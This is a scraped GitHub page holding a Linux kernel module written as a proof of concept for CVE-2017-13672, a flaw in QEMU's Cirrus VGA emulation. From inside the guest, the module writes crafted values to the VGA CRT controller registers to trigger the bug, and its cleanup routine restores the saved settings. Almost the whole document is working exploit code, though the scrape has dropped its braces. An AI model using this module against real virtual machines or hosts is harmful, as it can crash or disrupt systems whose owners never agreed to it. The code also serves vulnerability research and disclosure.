Skip to content
Switch branches/tags
Go to file
Cannot retrieve contributors at this time
63 lines (48 sloc) 1.77 KB
#define LINUX
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <asm/io.h>
#define DRIVER_AUTHOR "David Buchanan"
#define DRIVER_DESC "CVE-2017-13672 POC"
/* From qemu/hw/display/vga_regs.h */
#define VGA_CRT_IC 0x3D4 /* CRT Controller Index - color emulation */
#define VGA_CRT_DC 0x3D5 /* CRT Controller Data Register - color emulation */
/* From CL-GD5446 Technical Reference Manual */
#define VGA_CRC 0x0C /* CRTC Screen Start Address High Register */
#define VGA_CRD 0x0D /* CRTC Screen Start Address Low Register */
#define VGA_CR1B 0x1B /* Extended Display Controls Register */
#define VGA_CR1D 0x1D /* Overlay Extended Control Register */
unsigned char crc_bak, crd_bak, cr1b_bak, cr1d_bak;
unsigned char vga_crt_read(unsigned char reg) {
outb_p(reg, VGA_CRT_IC);
return inb_p(VGA_CRT_DC);
void vga_crt_write(unsigned char val, unsigned char reg) {
outb_p(reg, VGA_CRT_IC);
outb_p(val, VGA_CRT_DC);
int init_module(void)
printk(KERN_ALERT "Attempting to exploit CVE-2017-13672...\n");
crc_bak = vga_crt_read(VGA_CRC);
crd_bak = vga_crt_read(VGA_CRD);
cr1b_bak = vga_crt_read(VGA_CR1B);
cr1d_bak = vga_crt_read(VGA_CR1D);
vga_crt_write(0xFF, VGA_CRC);
vga_crt_write(0xFF, VGA_CRD);
vga_crt_write(cr1b_bak | 0x0D, VGA_CR1B);
vga_crt_write(cr1d_bak | 0x80, VGA_CR1D); // usually only this bit needs to be set
return 0;
void cleanup_module(void)
printk("If you got this far, exploitation was unsuccessful. Attempting to unload CVE-2017-13672. This may or may not fix your graphics.\n");
vga_crt_write(crc_bak, VGA_CRC);
vga_crt_write(crd_bak, VGA_CRD);
vga_crt_write(cr1b_bak, VGA_CR1B);
vga_crt_write(cr1d_bak, VGA_CR1D);